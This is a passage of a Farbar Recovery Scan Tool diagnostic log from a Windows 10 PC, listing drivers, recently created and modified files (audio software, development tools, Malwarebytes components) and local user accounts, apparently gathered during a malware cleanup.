R1 veracrypt; C:\Windows\System32\drivers\veracrypt.sys [631200 2018-01-16] (IDRIX -> IDRIX)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [46472 2019-10-29] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [351968 2019-10-29] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [53984 2019-10-29] (Microsoft Windows -> Microsoft Corporation)
R1 ZAM_Guard; C:\Windows\System32\drivers\zamguard64.sys [203680 2017-06-03] (Zemana Ltd. -> Zemana Ltd.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-11-26 13:22 - 2019-11-26 13:22 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\16251371.sys
2019-11-26 13:21 - 2019-11-26 13:49 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2019-11-26 13:21 - 2019-11-26 13:38 - 000000000 ____D C:\Users\SR\Desktop\mbar
2019-11-25 12:54 - 2019-11-25 12:54 - 009089848 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2019-11-25 12:54 - 2019-11-25 12:54 - 001456720 _____ (Microsoft Corporation) C:\Windows\system32\osloader.efi
2019-11-25 01:38 - 2019-11-26 13:39 - 000278344 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2019-11-25 01:38 - 2019-11-25 01:38 - 000216544 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2019-11-25 00:08 - 2019-11-25 11:33 - 000000872 _____ C:\Users\Public\Desktop\REAPER (x64).lnk
2019-11-25 00:08 - 2019-11-25 11:33 - 000000872 _____ C:\ProgramData\Desktop\REAPER (x64).lnk
2019-11-25 00:08 - 2019-11-25 00:08 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\REAPER (x64)
2019-11-24 20:00 - 2019-11-24 20:00 - 000081073 _____ C:\Users\SR\Desktop\Addition.txt
2019-11-24 20:00 - 2019-11-24 20:00 - 000060028 _____ C:\Users\SR\Desktop\FRST.txt
2019-11-24 19:50 - 2019-11-26 14:03 - 000000000 ____D C:\FRST
2019-11-24 18:57 - 2019-11-26 13:39 - 000000000 ___HD C:\Windows\rss
2019-11-24 00:05 - 2019-11-24 00:05 - 000000000 ____D C:\Users\SR\Documents\Joshua Bell Violin
2019-11-23 23:48 - 2019-11-24 00:35 - 000011305 _____ C:\Users\SR\Desktop\Named Notes for various VIs.xlsx
2019-11-23 22:00 - 2019-11-24 18:58 - 000009127 _____ C:\Users\SR\Desktop\New Microsoft Excel Worksheet.xlsx
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\Users\SR\AppData\Roaming\ExponentialAudio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Exponential Audio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\ExponentialAudio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\AudioUTOPiA
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\Program Files\Common Files\vst3
2019-11-19 23:08 - 2019-11-19 23:09 - 000000000 ____D C:\Users\SR\Desktop\New folder
2019-11-19 21:06 - 2019-11-19 18:40 - 000514360 _____ C:\Users\SR\Desktop\Spitfire Solo Cello.nicnt
2019-11-19 18:32 - 2019-11-19 18:32 - 000000040 _____ C:\Users\SR\Desktop\Spitfire Solo Cello_info.nkc
2019-11-19 17:50 - 2019-11-19 17:50 - 000000000 _____ C:\Users\SR\Desktop\Spitfire Solo Cello_info.nkx
2019-11-18 13:04 - 2019-11-18 13:04 - 000001289 _____ C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FolderSize.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000001090 _____ C:\Users\Public\Desktop\Kontakt 5.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000001090 _____ C:\ProgramData\Desktop\Kontakt 5.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000000000 __HDC C:\ProgramData\{06D838A8-9544-4D7D-808F-4ED187621BBB}
2019-11-17 22:49 - 2019-11-17 23:42 - 000000000 ____D C:\Users\SR\Desktop\old Native Instruments folder
2019-11-17 21:04 - 2019-11-17 21:04 - 000000000 ____D C:\Users\Public\Documents\NI Resources
2019-11-17 21:04 - 2019-11-17 21:04 - 000000000 ____D C:\ProgramData\Documents\NI Resources
2019-11-16 00:54 - 2019-11-16 00:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2019-11-14 14:19 - 2019-11-14 14:19 - 000051024 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-stable.sys
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-dev.sys
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-canary.sys
2019-11-11 14:05 - 2019-11-11 14:05 - 000000000 ____D C:\Users\SR\AppData\Roaming\Subversion
2019-11-11 14:05 - 2019-11-11 14:05 - 000000000 ____D C:\Users\SR\.android
2019-11-11 14:04 - 2019-11-11 14:04 - 000000000 ____D C:\Users\SR\Documents\Embarcadero
2019-11-11 13:49 - 2019-11-11 13:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Embarcadero InterBase XE7
2019-11-11 13:49 - 2016-02-25 19:35 - 001287496 _____ (Embarcadero Technologies, Inc.) C:\Windows\SysWOW64\gds32.dll
2019-11-11 13:49 - 2016-02-25 19:35 - 000031560 _____ (Embarcadero Technologies, Inc.) C:\Windows\SysWOW64\ibxml.dll
2019-11-11 13:49 - 2016-02-25 18:57 - 001766728 _____ (Embarcadero Technologies, Inc.) C:\Windows\system32\ibclient64.dll
2019-11-11 13:49 - 2016-02-25 18:57 - 000034632 _____ (Embarcadero Technologies, Inc.) C:\Windows\system32\ibxml64.dll
2019-11-11 13:48 - 2019-11-11 13:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Development Kit
2019-11-11 13:23 - 2019-11-11 13:36 - 000000000 ____D C:\Users\Public\Documents\Embarcadero
2019-11-11 13:23 - 2019-11-11 13:36 - 000000000 ____D C:\ProgramData\Documents\Embarcadero
2019-11-11 00:59 - 2019-11-11 14:22 - 000000000 ____D C:\Users\SR\AppData\Roaming\Embarcadero
2019-11-11 00:59 - 2019-11-11 14:22 - 000000000 ____D C:\ProgramData\Embarcadero
2019-11-11 00:57 - 2019-11-11 00:57 - 000000000 ____D C:\Users\SR\AppData\Local\PackageAware
2019-11-10 23:04 - 2019-11-10 23:04 - 000000000 ____D C:\wxWidgets-3.0.4
2019-11-10 23:04 - 2019-11-10 23:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\wxWidgets 3.0.4
2019-11-10 22:32 - 2019-11-10 23:12 - 000000000 ____D C:\Users\SR\Documents\srCodeBlock
2019-11-10 22:27 - 2019-11-11 14:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeBlocks
2019-11-10 22:27 - 2019-11-10 23:18 - 000000000 ____D C:\Users\SR\AppData\Roaming\CodeBlocks
2019-11-10 20:56 - 2019-11-10 20:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Visual Studio 2017 Tools for Unity
2019-11-10 20:55 - 2019-11-10 20:55 - 000000000 ____D C:\Program Files (x86)\Windows Phone Kits
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\ProgramData\Windows App Certification Kit
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\Program Files\Application Verifier
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\Program Files (x86)\Application Verifier
2019-11-10 20:40 - 2018-04-11 06:46 - 000402944 _____ (Windows ® Win 7 DDK provider) C:\Windows\system32\DXCpl.exe
2019-11-10 20:40 - 2018-04-11 06:44 - 000350208 _____ (Microsoft Corporation) C:\Windows\system32\perf_gputiming.dll
2019-11-10 20:40 - 2018-04-11 05:12 - 000380416 _____ (Windows ® Win 7 DDK provider) C:\Windows\SysWOW64\DXCpl.exe
2019-11-10 20:40 - 2018-04-11 05:11 - 000271360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\perf_gputiming.dll
2019-11-10 20:40 - 2018-04-10 21:41 - 000095744 _____ (Microsoft Corporation) C:\Windows\system32\DxToolsReportGenerator.dll
2019-11-10 20:40 - 2018-04-10 21:37 - 000095744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DxToolsReportGenerator.dll
2019-11-10 20:40 - 2018-04-10 21:15 - 017871360 _____ (Microsoft Corporation) C:\Windows\system32\DXCaptureReplay.dll
2019-11-10 20:40 - 2018-04-10 21:15 - 014058496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXCaptureReplay.dll
2019-11-10 20:40 - 2018-04-10 21:11 - 000061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VSD3DWARPDebug.dll
2019-11-10 20:40 - 2018-04-10 21:11 - 000041984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsProxyStub.dll
2019-11-10 20:40 - 2018-04-10 21:10 - 000142336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsMonitor.dll
2019-11-10 20:40 - 2018-04-10 21:10 - 000118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsReporting.dll
2019-11-10 20:40 - 2018-04-10 21:09 - 000238592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXGIDebug.dll
2019-11-10 20:40 - 2018-04-10 21:09 - 000091136 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsProxyStub.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 004529664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsDesktopEngine.exe
2019-11-10 20:40 - 2018-04-10 21:08 - 003632640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsRemoteEngine.exe
2019-11-10 20:40 - 2018-04-10 21:08 - 002249728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d12SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 001100288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11_3SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000466944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d2d1debug3.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000334848 _____ (Microsoft Corporation) C:\Windows\system32\DXGIDebug.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000078848 _____ (Microsoft Corporation) C:\Windows\system32\VSD3DWARPDebug.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 001359872 _____ (Microsoft Corporation) C:\Windows\system32\d3d11_3SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 000221184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsExperiment.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 000176128 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsReporting.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 004858880 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsRemoteEngine.exe
2019-11-10 20:40 - 2018-04-10 21:06 - 001500160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsOfflineAnalysis.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 000921088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXCap.exe
2019-11-10 20:40 - 2018-04-10 21:06 - 000539136 _____ (Microsoft Corporation) C:\Windows\system32\d2d1debug3.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 000124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsCapture.dll
2019-11-10 20:40 - 2018-04-10 21:05 - 005746688 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsDesktopEngine.exe
2019-11-10 20:40 - 2018-04-10 21:05 - 002000896 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsOfflineAnalysis.dll
2019-11-10 20:40 - 2018-04-10 21:05 - 000164864 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsCapture.dll
2019-11-10 20:40 - 2018-04-10 21:04 - 000189952 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsMonitor.dll
2019-11-10 20:40 - 2018-04-10 21:03 - 002818560 _____ (Microsoft Corporation) C:\Windows\system32\d3d12SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:02 - 001178624 _____ (Microsoft Corporation) C:\Windows\system32\DXCap.exe
2019-11-10 20:40 - 2018-04-10 21:02 - 000286720 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsExperiment.dll
2019-11-10 20:36 - 2019-11-10 20:36 - 000000000 ____D C:\Program Files (x86)\NuGet
2019-11-10 20:35 - 2019-11-10 20:35 - 000000000 ____D C:\Users\SR\.dotnet
2019-11-10 20:35 - 2019-11-10 20:35 - 000000000 ____D C:\Program Files\dotnet
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\3082
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\2052
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1055
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1049
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1046
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1045
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1042
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1041
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1040
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1036
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1033
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1031
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1029
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1028
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\3082
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\2052
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1055
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1049
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1046
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1045
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1042
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1041
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1040
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1036
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1033
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1031
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1029
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1028
2019-11-10 20:34 - 2019-11-10 20:34 - 000001843 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Blend for Visual Studio 2017.lnk
2019-11-10 20:34 - 2019-11-10 20:34 - 000000000 ____D C:\Program Files (x86)\Entity Framework Tools
2019-11-10 20:33 - 2019-11-10 20:33 - 000001499 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2017.lnk
2019-11-05 18:52 - 2019-11-05 18:52 - 000000000 ____D C:\Users\SR\AppData\Local\Viber
2019-10-28 22:34 - 2019-10-28 22:34 - 000000000 ____D C:\Users\SR\Desktop\FIFA-19---Career-Mode-Cheat-Table-master

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-11-26 14:02 - 2019-08-14 11:29 - 000039823 _____ C:\Windows\ZAM_Guard.krnl.trace
2019-11-26 14:02 - 2018-04-12 01:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-11-26 13:53 - 2018-06-02 15:28 - 001464880 _____ C:\Windows\system32\PerfStringBackup.INI
2019-11-26 13:53 - 2018-06-02 13:32 - 000550540 _____ C:\Windows\system32\perfh008.dat
2019-11-26 13:53 - 2018-06-02 13:32 - 000088248 _____ C:\Windows\system32\perfc008.dat
2019-11-26 13:53 - 2018-04-12 01:36 - 000000000 ____D C:\Windows\INF
2019-11-26 13:51 - 2018-06-01 16:16 - 000000000 ____D C:\ProgramData\NVIDIA
2019-11-26 13:51 - 2017-05-25 17:31 - 000000000 ____D C:\Users\SR\AppData\LocalLow\Mozilla
2019-11-26 13:50 - 2017-10-10 18:36 - 000000000 ____D C:\Users\SR\Documents\DesktopReminder
2019-11-26 13:49 - 2018-06-06 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2019-11-26 13:49 - 2018-06-02 15:24 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-11-26 13:49 - 2018-06-02 15:16 - 000000000 ____D C:\Windows\system32\SleepStudy
2019-11-26 13:49 - 2017-06-15 17:44 - 000000000 ____D C:\ProgramData\Reprise
2019-11-26 13:38 - 2017-05-26 14:22 - 000000000 ____D C:\Users\SR\AppData\Local\CrashDumps
2019-11-26 13:23 - 2017-05-25 19:29 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-11-26 09:49 - 2018-10-19 19:31 - 000000000 ____D C:\Windows\Minidump
2019-11-25 23:47 - 2017-11-04 13:39 - 000011564 _____ C:\Windows\system32\DVCState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-25 23:47 - 2017-11-04 13:39 - 000001164 _____ C:\Windows\system32\BMXCtrlState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-25 23:47 - 2017-11-04 13:39 - 000001164 _____ C:\Windows\system32\BMXBkpCtrlState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-25 23:47 - 2017-11-04 13:39 - 000000072 _____ C:\Windows\system32\BMXStateBkp-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-25 23:47 - 2017-11-04 13:39 - 000000072 _____ C:\Windows\system32\BMXState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx
2019-11-25 21:21 - 2018-06-02 15:19 - 000000000 ____D C:\Users\SR
2019-11-25 21:21 - 2018-04-11 23:04 - 000524288 _____ C:\Windows\system32\config\BBI
2019-11-25 13:29 - 2017-09-08 20:54 - 000000000 ____D C:\Users\SR\Documents\REAPER Media
2019-11-25 13:29 - 2017-05-26 16:39 - 000000000 ____D C:\Users\SR\AppData\Roaming\REAPER
2019-11-25 13:23 - 2018-06-02 15:24 - 000003374 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3967059023-4107875624-2872843465-1001
2019-11-25 13:23 - 2018-06-02 15:19 - 000002403 _____ C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2019-11-25 13:23 - 2017-05-25 17:10 - 000000000 ___RD C:\Users\SR\OneDrive
2019-11-25 11:33 - 2017-05-26 16:40 - 000000000 ____D C:\Program Files\REAPER (x64)
2019-11-25 01:38 - 2019-08-11 17:31 - 000153312 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2019-11-25 01:38 - 2019-08-11 17:31 - 000020936 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamElam.sys
2019-11-25 01:38 - 2019-08-11 17:31 - 000002024 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-11-25 01:38 - 2019-08-11 17:31 - 000002024 _____ C:\ProgramData\Desktop\Malwarebytes.lnk
2019-11-25 01:38 - 2017-11-23 11:26 - 000000000 ____D C:\Users\SR\AppData\Local\cache
2019-11-25 01:33 - 2017-08-27 21:09 - 000000000 ____D C:\Users\SR\AppData\LocalLow\Temp
2019-11-25 01:28 - 2018-06-02 15:24 - 000000000 ____D C:\Windows\system32\Tasks\JumpingBytes
2019-11-24 18:57 - 2017-06-12 13:15 - 000011914 __RSH C:\ProgramData\ntuser.pol
2019-11-24 18:37 - 2017-05-26 12:04 - 000000000 ____D C:\Users\SR\AppData\Roaming\qBittorrent
2019-11-24 10:51 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\AppReadiness
2019-11-23 18:35 - 2018-04-12 01:38 - 000000000 ___HD C:\Program Files\WindowsApps
2019-11-22 21:41 - 2017-05-26 15:08 - 000002096 _____ C:\Windows\Sandboxie.ini
2019-11-21 20:12 - 2019-02-18 21:23 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2019-11-21 19:49 - 2017-05-26 16:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Native Instruments
2019-11-21 17:13 - 2019-07-15 15:01 - 000000000 ____D C:\Users\SR\AppData\Roaming\ViberPC
2019-11-21 01:11 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\LiveKernelReports
2019-11-19 23:10 - 2017-05-26 16:56 - 000000000 ____D C:\Program Files\Native Instruments
2019-11-19 11:34 - 2019-03-02 14:15 - 000634880 _____ C:\Users\SR\Documents\MeNew_v2.fmp12
2019-11-18 15:43 - 2019-10-19 15:18 - 000018960 _____ (Logitech, Inc.) C:\Windows\system32\Drivers\LNonPnP.sys
2019-11-18 14:07 - 2019-10-03 18:47 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2019-11-18 14:07 - 2019-10-03 18:47 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData
2019-11-17 21:04 - 2017-09-08 20:57 - 000027684 _____ C:\Users\SR\Desktop\sc3.tmp
2019-11-17 15:25 - 2017-05-26 12:41 - 000000000 ____D C:\Users\SR\Documents\Camtasia Studio
2019-11-17 13:17 - 2018-01-16 19:24 - 000000000 ____D C:\Users\SR\AppData\Roaming\vlc
2019-11-16 00:54 - 2018-01-03 12:14 - 000000000 ____D C:\Program Files (x86)\Dropbox
2019-11-16 00:19 - 2018-11-26 20:34 - 000006144 _____ C:\Users\SR\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2019-11-14 19:23 - 2017-09-08 22:18 - 000000000 ____D C:\Users\SR\AppData\Roaming\Mp3tag
2019-11-14 12:13 - 2018-04-12 15:16 - 000000000 ____D C:\Users\SR\AppData\Local\PlaceholderTileLogoFolder
2019-11-13 15:13 - 2018-02-14 15:35 - 000000000 ____D C:\Users\SR\AppData\Local\Packages
2019-11-13 13:02 - 2017-05-25 19:45 - 000748816 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2019-11-12 12:45 - 2018-06-02 15:16 - 005163280 _____ C:\Windows\system32\FNTCACHE.DAT
2019-11-11 17:40 - 2018-01-03 12:23 - 000000000 ___RD C:\Users\SR\Dropbox
2019-11-11 15:38 - 2017-08-27 19:44 - 000000000 ____D C:\Users\SR\AppData\Roaming\Visual Studio Setup
2019-11-11 13:49 - 2015-07-10 13:04 - 000017535 _____ C:\Windows\system32\Drivers\etc\services
2019-11-11 13:48 - 2017-09-07 13:40 - 000000000 ____D C:\Users\SR\.oracle_jre_usage
2019-11-11 13:48 - 2017-05-26 16:29 - 000000000 ____D C:\Program Files\Java
2019-11-11 13:48 - 2017-05-25 21:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2019-11-10 20:52 - 2017-08-27 19:49 - 000000000 ____D C:\Program Files (x86)\Microsoft SDKs
2019-11-10 20:48 - 2017-06-30 19:12 - 000000000 ____D C:\ProgramData\Package Cache
2019-11-10 20:46 - 2018-04-12 01:30 - 000000000 ____D C:\Windows\CbsTemp
2019-11-10 20:34 - 2017-08-27 19:44 - 000000000 ____D C:\Program Files (x86)\Microsoft Visual Studio
2019-11-10 20:34 - 2017-06-11 17:39 - 000000000 ____D C:\Program Files (x86)\Microsoft SQL Server
2019-11-10 20:33 - 2018-06-02 13:14 - 000000000 ____D C:\Program Files (x86)\MSBuild
2019-11-10 20:33 - 2018-04-12 01:38 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2019-11-10 20:33 - 2017-08-27 19:49 - 000000000 ____D C:\Program Files (x86)\Windows Kits
2019-11-10 16:31 - 2019-01-08 14:50 - 000000000 ____D C:\Users\SR\AppData\Roaming\temp_info_collect
2019-11-10 16:30 - 2019-01-08 14:50 - 000000000 ____D C:\ProgramData\EMM
2019-11-09 19:38 - 2017-08-27 20:07 - 000000000 ____D C:\Users\SR\Documents\Visual Studio 2017
2019-11-09 19:32 - 2017-08-27 19:44 - 000001402 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio Installer.lnk
2019-11-08 14:06 - 2019-10-09 15:00 - 000000000 ____D C:\Users\SR\Desktop\Unused Mods
2019-11-08 12:53 - 2017-05-27 13:55 - 000000000 ____D C:\Users\SR\Documents\Flight Simulator X Files
2019-11-03 17:55 - 2017-05-25 17:30 - 000000000 ____D C:\Program Files\Mozilla Firefox
2019-11-03 17:55 - 2017-05-25 17:30 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-11-03 13:05 - 2017-11-15 14:46 - 000001275 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2019-10-31 10:47 - 2019-04-17 23:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IconShepherd
2019-10-31 10:47 - 2019-04-17 23:11 - 000000000 ____D C:\Program Files\IconShepherd
2019-10-29 10:07 - 2018-03-01 10:19 - 000000000 ____D C:\Windows\system32\Drivers\wd
2019-10-28 22:32 - 2018-12-02 22:13 - 000000000 ____D C:\Users\SR\Documents\FIFA 19

==================== Files in the root of some directories ========

2019-08-11 17:16 - 2019-08-11 17:16 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2019-08-11 17:16 - 2019-08-11 17:16 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2017-06-18 13:13 - 2019-10-20 14:44 - 000000132 ____H () C:\Users\SR\AppData\Roaming\Adobe PNG Format CC Prefs
2017-05-27 13:13 - 2017-05-27 13:13 - 000001167 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.1.txt
2017-05-27 13:13 - 2017-05-29 13:58 - 000000905 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.txt
2017-05-27 13:13 - 2017-05-29 13:58 - 000000000 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
2019-06-01 18:59 - 2019-10-20 14:40 - 000001456 _____ () C:\Users\SR\AppData\Local\Adobe Save for Web 13.0 Prefs
2018-11-26 20:34 - 2019-11-16 00:19 - 000006144 _____ () C:\Users\SR\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-09-27 17:57 - 2018-09-27 17:57 - 000000000 _____ () C:\Users\SR\AppData\Local\oobelibMkey.log
2017-06-05 14:13 - 2017-07-14 23:32 - 000007598 _____ () C:\Users\SR\AppData\Local\Resmon.ResmonCfg
2018-03-01 13:55 - 2019-07-25 12:32 - 000001207 _____ () C:\Users\SR\AppData\Local\SuperJolt.Common.log
2018-03-01 13:55 - 2019-07-25 12:32 - 000002529 _____ () C:\Users\SR\AppData\Local\SuperJolt.Snapper.log
2017-06-10 15:40 - 2017-06-12 13:14 - 000930816 _____ () C:\Users\SR\AppData\Local\test_db_cara.db

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restored successfully
==================== End of FRST.txt ========================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 25-11-2019 01
Ran by SR (26-11-2019 14:03:35)
Running from D:\Users\SR\Downloads
Windows 10 Pro Version 1803 17134.345 (X64) (2018-06-02 13:24:39)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3967059023-4107875624-2872843465-500 - Administrator - Disabled) => C:\Users\Administrator
DefaultAccount (S-1-5-21-3967059023-4107875624-2872843465-503 - Limited - Disabled)
Guest (S-1-5-21-3967059023-4107875624-2872843465-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-3967059023-4107875624-2872843465-1006 - Limited - Enabled)
SR (S-1-5-21-3967059023-4107875624-2872843465-1001 - Administrator - Enabled) => C:\Users\SR
